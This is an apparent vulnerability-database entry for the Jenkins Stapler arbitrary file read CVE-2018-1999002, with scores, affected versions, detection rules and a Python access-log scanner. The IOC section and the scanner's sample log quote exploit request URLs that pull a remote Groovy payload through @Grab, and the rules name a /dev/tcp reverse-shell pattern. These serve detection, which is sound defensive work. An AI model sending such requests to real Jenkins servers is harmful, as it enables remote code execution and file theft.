cbcvebase.
CVE-2018-1999002
published 2018-07-23

Priority P2 · 75 · high · 7.5 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EXPLOIT
EPSS: 86.64% (99.7th percentile)
An arbitrary file read vulnerability exists in Jenkins 2.132 and earlier and LTS 2.121.1 and earlier, in the Stapler web framework's org/kohsuke/stapler/Stapler.java, that allows attackers to send crafted HTTP requests returning the contents of any file on the Jenkins master file system that the Jenkins master has access to.

Affected

7 ranges

Vendor  | Product                                               | Version range  | Fixed in
jenkins | files_indicating_when_a_plugin                        |                |
jenkins | jenkins                                               | <= 2.121.1     |
jenkins | jenkins                                               | 2.122 – 2.132  |
jenkins | jenkins_core                                          |                |
jenkins | jenkins_lts                                           |                |
jenkins | jenkins_weekly                                        |                |
oracle  | communications_cloud_native_core_automated_test_suite |                |

Detection & IOCs (extracted from sources)

url: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27{:s}%27,%20root=%27http://{:s}%27)%0a@Grab(group=%27package%27,%20module=%27{:s}%27,%20version=%271%27)%0aimport%20Payload;
path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
path: /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
path: /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
cookie: JSESSIONID.wetw0rk!
  • Detect unauthenticated or authenticated HTTP GET requests to the Jenkins Stapler framework containing path traversal patterns targeting arbitrary files on the Jenkins master filesystem.
  • Alert on HTTP GET requests to /securityRealm/user/*/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile containing @GrabConfig, @GrabResolver, and @Grab annotations in the value parameter — this is the chained CVE-2019-1003000 + CVE-2018-1999002 pre-auth RCE trigger.
  • Alert on HTTP GET requests to /securityRealm/user/*/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript with sandbox=true and a value parameter containing .execute() — indicative of sandbox bypass exploitation.
  • Monitor Jenkins master process for outbound DNS or HTTP connections to unexpected external hosts immediately following requests to the checkScriptCompile or checkScript endpoints — indicates successful SSRF/RCE via Groovy @Grab.
  • Detect creation of META-INF/services/org.codehaus.groovy.plugins.Runners on disk, which is a key artifact of the exploit's malicious JAR payload staging.
  • Monitor for Jenkins processes spawning /bin/bash -c with a reverse shell payload (bash -i >& /dev/tcp/...) as a child process, indicating successful RCE.
  • The exploit targets a specific combination of vulnerable plugin versions. Confirm the environment has Script Security <=1.49, Pipeline: Declarative <=1.3.4, and Pipeline: Groovy <=2.61 before treating detections as confirmed exploitation.
  • CVE-2018-1999002 (arbitrary file read) affects Jenkins <=2.132 and <=2.121.1 LTS. Red Hat OpenShift Enterprise 3 was assessed as Not Affected; tune detections accordingly for containerized/OCP deployments.
  • The chained pre-auth RCE requires CVE-2018-1999002 (file read) combined with CVE-2019-1003000 (sandbox bypass). Detections for the file-read path alone may not indicate full RCE; look for the combination of both endpoint accesses.
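The two request-based rules above (the checkScriptCompile request carrying the @GrabConfig/@GrabResolver/@Grab chain, and the checkScript request with sandbox=true and .execute() in value=) as a scanner over access-log lines. This is an added example, not code from this page or from the Jenkins project: the common-log-format layout, the sample lines, and the rule names are constructed, and the user segment of the path is matched as a wildcard as the rules state.

```python
"""Run the two request-based detection rules over Jenkins access-log lines.

Added example (not code from the page or the Jenkins project).  The
common-log-format layout, the sample lines and the rule names are constructed.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoints named in the rules; the user segment is a wildcard
# (the page writes it as /securityRealm/user/*/... or {{to_lower(username)}}).
CHECK_SCRIPT_COMPILE = re.compile(
    r"^/securityRealm/user/[^/]+/descriptorByName/"
    r"org\.jenkinsci\.plugins\.workflow\.cps\.CpsFlowDefinition/checkScriptCompile$"
)
CHECK_SCRIPT = re.compile(
    r"^/securityRealm/user/[^/]+/descriptorByName/"
    r"org\.jenkinsci\.plugins\.scriptsecurity\.sandbox\.groovy\.SecureGroovyScript/checkScript$"
)
# The @Grab-chain rule requires all three annotations in value=.
GRAB_ANNOTATIONS = ("@GrabConfig", "@GrabResolver", "@Grab")

# Request line inside a common-log-format record: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def full_decode(s: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded) so %40Grab and %2540Grab compare as @Grab."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_request(method: str, target: str) -> Optional[str]:
    """Return a rule name when the request matches one of the two rules, else None."""
    if method != "GET":  # the rules above are stated for GET requests
        return None
    parts = urlsplit(target)
    path = full_decode(parts.path)
    params = parse_qs(parts.query, keep_blank_values=True)
    # Join repeated value= parameters so a script split across them is still inspected whole.
    value = full_decode(" ".join(params.get("value", [])))
    if CHECK_SCRIPT_COMPILE.match(path) and all(a in value for a in GRAB_ANNOTATIONS):
        return "checkScriptCompile_grab_chain"
    if CHECK_SCRIPT.match(path):
        sandbox = [v.lower() for v in params.get("sandbox", [])]
        if "true" in sandbox and ".execute(" in value:
            return "checkScript_sandbox_bypass"
    return None


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, rule name) for each log line that fires a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            rule = classify_request(m["method"], m["target"])
            if rule:
                hits.append((n, rule))
    return hits


# Constructed sample access log: one benign request, one hit per rule, and one
# legitimate checkScript syntax check (no .execute()) that must not fire.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Jul/2018:10:00:01 +0000] "GET /job/build/lastBuild/console HTTP/1.1" 200 512',
    '10.0.0.9 - - [23/Jul/2018:10:00:02 +0000] "GET /securityRealm/user/admin/descriptorByName/'
    'org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig('
    'disableChecksums=true)%0a@GrabResolver(name=%27r%27,%20root=%27http://resolver.example%27)'
    '%0a@Grab(group=%27package%27,%20module=%27m%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 200 34',
    '10.0.0.9 - - [23/Jul/2018:10:00:03 +0000] "GET /securityRealm/user/admin/descriptorByName/'
    'org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript'
    '?sandbox=true&value=cmd.execute() HTTP/1.1" 200 34',
    '10.0.0.7 - - [23/Jul/2018:10:00:04 +0000] "GET /securityRealm/user/dev/descriptorByName/'
    'org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript'
    '?sandbox=true&value=println(1) HTTP/1.1" 200 34',
]

if __name__ == "__main__":
    for line_no, rule in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {rule}")
```

The path and value are percent-decoded (bounded, until stable) before matching, so a request that encodes `@` as `%40` or double-encodes it is still compared against the same literals; the method filter follows the rules' wording (GET) and is the one line to relax if the deployment's logs show other verbs reaching these endpoints.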

CVSS provenance

Source        | Version | Score | Severity | Vector
nvd           | v3.1    | 7.5   | HIGH     | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvd           | v2.0    | 5.0   | MEDIUM   | AV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_redhat |         | 7.5   | HIGH     |